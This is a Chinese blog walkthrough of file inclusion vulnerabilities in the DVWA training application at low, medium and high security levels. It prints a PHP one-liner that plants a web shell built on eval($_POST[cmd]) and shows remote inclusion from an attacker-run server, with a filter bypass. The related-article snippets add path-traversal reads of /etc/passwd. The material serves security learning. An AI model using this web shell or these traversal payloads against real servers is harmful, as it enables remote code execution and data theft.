DVWA文件包含漏洞(file inclusion)

最新推荐文章于 2023-05-18 15:00:01 发布
最新推荐文章于 2023-05-18 15:00:01 发布
阅读量948 收藏 2
点赞数 2
分类专栏: 网安 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kirito_pio/article/details/106565478
版权

目录

1、low级别

1.1 本地文件包含

1.2 远程文件包含

2、medium级别

3、high级别

文件包含漏洞是在主机要执行的文件中添加包含木马的文件。

low级别和medium级别分别有远程文件包含(RFI)和本地文件包含(LFI),high级别使用了白名单,无法绕过。

1、low级别

1.1 本地文件包含

在 https://blog.csdn.net/kirito_pio/article/details/106547336 中,完成了对各个级别的文件上传,但是在执行high级别时只进行了上传,不能使用菜刀,因为图片是静态的文件,不能自己执行,需要等待请求。

图片中包含的一句话脚本如下,可以在执行时新建并写入一个php文件。

 <?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>

对low级别的代码如下,直接对资源进行访问,不设置过滤。


<?php

    $file = $_GET['page']; //The page we wish to display 

?>

先根据 https://blog.csdn.net/kirito_pio/article/details/106547336 high级别进行图片的上传。

再切换到file inclusion,输入上传文件的网址,记得要把安全级别切换到low,high的话不会成功;如果出现各种字符,说明读取到了文件。

为了验证结果,可以去靶机下的/var/www/dvwa/vulnerabilities/fi进行查看,会发现增加了shell.php文件;最后可以通过菜刀对文件进行增删进行验证。

1.2 远程文件包含

远程文件包含是主机访问远端的一个服务器,所以要设置一个服务器,可以使用kali。

首先,保证靶机的allow_url_fopen是开启的(保证可以使用URL去包含文件),文件路径是/etc/php5/cli/php.ini

第二步,搭建服务器。我使用的是kali(ip:192.168.5.131),使用命令systemctl start apache2 开启服务,用systemctl status apache2检测状态。

kali存放网络文件的路径为/var/www/html,把需要访问的shell文件放在此路径下。

注意:此处的shell文件的类型不能设为.php,我用的是.txt。

第三步,进行访问。在 page= 后加入网址。

第四步,进行验证。和之前一样,使用菜刀;也可以去靶机的/var/www/dvwa/vulnerabilities/fi路径下进行查看,多了shell.php文件。

2、medium级别

对于网站的php代码,增加了对http/https协议的过滤。


<?php

    $file = $_GET['page']; // The page we wish to display 

    // Bad input validation
    $file = str_replace("http://", "", $file);
    $file = str_replace("https://", "", $file);        


?>

因为本地文件包含不涉及http协议,所以,medium级别下本地文件包含和low级别下没有区别

远程文件包含,代码会筛选出http://和https://并删除,所以可以在之前的low级别下输入的网址进行插入。

其他操作均与low相同。

3、high级别

high级别是安全的。代码如下,指定了执行的白名单,只允许特定的文件执行。


<?php
        
    $file = $_GET['page']; //The page we wish to display 

    // Only allow include.php
    if ( $file != "include.php" ) {
        echo "ERROR: File not found!";
        exit;
    }

 

kirito_pio
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
DVWA系列之File Inclusion(文件包含)源码分析及漏洞利用
7Riven's blog
11-27 1088
什么是文件包含? 程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,无需再次编写,这种调用文件的过程一般被称为文件包含文件包含漏洞的成因 随着网站业务的需求,程序开发人员一般希望代码更灵活,所以将被包含的文件设置为变量,用来进行动态调用,但是正是这种灵活性通过动态变 量的方式引入需要包含的文件时,用户对这个变量可控而且服务端又没有做合理的校验或者校验被绕过...
文件包含漏洞攻击(DVWA)
魔仙棒棒之主的博客
05-11 2684
文件包含漏洞攻击DVWA一、文件包含漏洞二、Low难度1. 源码分析2. 本地文件包含LFI1)相对路径2)绝对路径3. 远程文件包含RFI三、Medium难度1. 源码分析2. 本地文件包含LFI1)相对路径2)绝对路径3. 远程文件包含RFI四、High难度1. 源码分析2. 本地文件包含五、Impossible难度1. 源码分析 一、文件包含漏洞 PHP文件包含漏洞是一种注入型漏洞 注入型漏洞还有XSS漏洞和SQL注入漏洞 PHP的文件包含可以直接执行包含文件的代码 包含的文件格式 是不受限制的,只要
DVWAFile Inclusion文件包含
RexHa的博客
10-01 1096
dvwa 文本包含漏洞的解析
DVWA之包含漏洞file Inclusion)——文件包含漏洞产生的原因、文件包含漏洞的利用方式、DVWA之包含漏洞file Inclusion
weixin_45116657的博客
09-10 2361
hahaha
文件包含漏洞利用(低中高级)
m0_73128456的博客
11-12 309
低级(Low):因为低级,所以代码对包含文件没有进行任何的过滤,这导致我们可以进行包含任何文件。如果直接包含一个不存在的文件ming.php,会发生报错,但是它会把dvwa这个网站的路径给暴露出来。就可以查看文件了,这里只可以看文件,不可以看网站,如淘宝.百度等。我这里是因为我查看的是图片,所以它是以十六进制表示的。,我们可以成功把淘宝的页面包含到dvwa的页面里面来。就可以成功把淘宝的页面包含到dvwa的页面里面来。高级(High):我们可以利用file://即可实现绕过,如网址。
DVWA-DVWA渗透测试平台文件
03-07
DVWA全称为Damn Vulnerable Web Application,意为存在糟糕漏洞的web应用。它是一个基于PHP/MySQL开发的存在糟糕漏洞的web应用,旨在为... DVWA现在已包含在流行的渗透测试Linux发行版中,例如Samurai的Web测试框架等。
DVWA-安装-漏洞测试-漏洞修复指南.docx
05-17
DVWA-安装-漏洞测试-漏洞修复指南-需要安装 xpmpp或WampServer。
PHP及DVWA文件包
07-28
PHP及DVWA文件包,内有phpstudy_x64_8.1.1.3及DVWA-master,DVWA解压可直接用。 DVWA页面登陆用户为root,密码为123456
DVWA-master.zip_DVWA_php_漏洞_靶场
09-24
php攻防练习靶场,多种漏洞组合,练习代码审计,避免开发出现漏洞
DVWA漏洞教学源码
06-01
DVWA (Dam Vulnerable Web Application) DVWA是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序,自测无后门
DVWA靶场--文件上传/包含(low-high).
Polaroid2的博客
10-12 449
仅用于技术分享。
2. DVWA亲测文件包含漏洞
weixin_30740295的博客
05-14 283
Low级: 我们分别点击这几个file.php文件 仅仅是配置参数的变化: http://127.0.0.1/DVWA/vulnerabilities/fi/?page=file3....
DVWA通关攻略之文件包含
勿山几已
05-18 1070
简单介绍文件包含漏洞,并基于DVWA演示利用方式。
6.File Inclusion(High)——小白笔记——文件包含漏洞
qwsn
11-11 1639
0x01:High级别 1.本地 1.?page=..././..././..././dvwa/php.ini //被过滤 2.使用file协议绕过fnmatch函数:?page=file:///var/www/html/dvwa/php.ini //绕过 //必须allow_url_fopen和allow_url_include置为on 2.远程 2.?page=hthttp:/...
DVWA靶场文件包含low
qq_14902381的博客
08-15 930
dvwa靶场文件包含漏洞
dvwaFile Inclusion
Alsn86的博客
02-04 704
dvwaFile Inclusion 进行包含的文件名由get方法的page参数传递 看一下包含的流程吧 index.php <?php define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' ); require_once DVWA_WEB_PAGE_TO_ROOT . 'dvwa/includes/dvwaPage.inc.php'; dvwaPageStartup( array( 'authenticated', 'phpids' ) ); $page =
DVWA-文件包含漏洞
热门推荐
qq_43660551的博客
03-05 1万+
文件包含:当服务器开启allow_url_include选项时,可以通过某些特性函数如:include() , require() , include_once() , require_once() 利用url去动态地包含文件,若未对文件进行来源审查,就会导致任意文件读取或者任意命令执行。 分类: (1)本地文件包含 (2)远程文件包含:因为开启了PHP配置中的allow_url_fopen选项,服务器允许包含一个远程文件。 一、low 看下服务器端核心代码:page为做任何过滤。
DVWA(4)文件包含(File InclusionLOW-HIGHT 操作记录
lllllaaa111的博客
11-08 711
今天带来第四期文件包含漏洞操作记录。初次接触DVWA,写下自己的操作记录,希望可以帮助每个刚接触DVWA的新手,同时希望可以提升自己的技术。注:如有操作不当的地方希望可以得到大神指导、交流。当被包含的文件在服务器本地时,就形成本地文件包含当被包含的文件在第三方服务器时,叫做远程文件包含
DVWAFile Inclusion
谢公子的博客
08-05 1373
File Inclusion File Inclusion,意思是文件包含漏洞),是指当服务器开启allow_url_include选项时,就可以通过php的某些特性函数(include(),require()和include_once(),require_once())利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。文件包含漏洞分为本地文件...
dvwa文件包含漏洞
最新发布
05-30
DVWA 中,文件包含漏洞通常是通过不正确使用用户输入来实现的。攻击者可以通过包含恶意文件来执行任意代码。以下是一个简单的示例,演示了如何在 DVWA 中利用文件包含漏洞: 1. 打开 DVWA 平台,进入 "File Inclusion" 选项中找到相关漏洞。 2. 在输入框中输入以下内容: ``` ../../../../../../../etc/passwd ``` 这将尝试包含系统中的 "/etc/passwd" 文件。 3. 点击提交按钮,应用程序将尝试包含您输入的文件,并显示文件内容。 请注意,这只是一个简单的示例,实际上的攻击可能会更复杂和危险。因此,开发人员应该采取适当的措施来防止文件包含漏洞的出现,例如对所有用户输入进行验证和过滤。在实际测试中,测试人员应该使用合适的工具和技术来测试文件包含漏洞,以确保应用程序的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值